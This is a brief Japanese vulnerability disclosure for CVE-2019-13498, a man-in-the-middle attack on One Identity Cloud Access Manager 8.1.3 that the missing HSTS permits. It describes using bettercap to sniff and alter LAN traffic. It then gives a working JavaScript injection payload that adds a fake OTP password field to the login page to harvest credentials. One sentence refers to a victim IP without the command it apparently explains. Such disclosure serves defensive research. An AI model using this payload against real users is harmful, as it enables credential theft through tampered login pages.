
CVE-2019-13498
脆弱性タイトル: MITM - HSTS欠如による認証情報とコンテンツ操作
日付: 07/10/2019
脆弱性作者: Furqan Khan
ベンダーホームページ: https://www.oneidentity.com/
ソフトウェアリンク: https://www.oneidentity.com/products/cloud-access-manager/
バージョン: 8.1.3
テスト環境: Kali Linux , Windows 7 ,Ubantu 16.04
ここで192.168.1.103は被害者のIPアドレスです。被害者のIPが不明な場合でも、bettercapを使用してLAN(攻撃者と被害者が共通のネットワーク)全体のトラフィックをスニッフィングし、コンテンツを操作できます。
<script>
function replace_payload()
{
var append_str='<div class="wrap-input100 validate-input m-b-20" data-validate="Password"><input class="cui-textbox" type="password" id="passwordTextbox" name="passwordTextbox"><span class="focus-cui-textbox" data-placeholder="OTP"></span></div>';
var text_div=$(".m-b-20");
text_div.append(append_str);
}
function control(){setTimeout(replace_payload,2000);} control();
</script>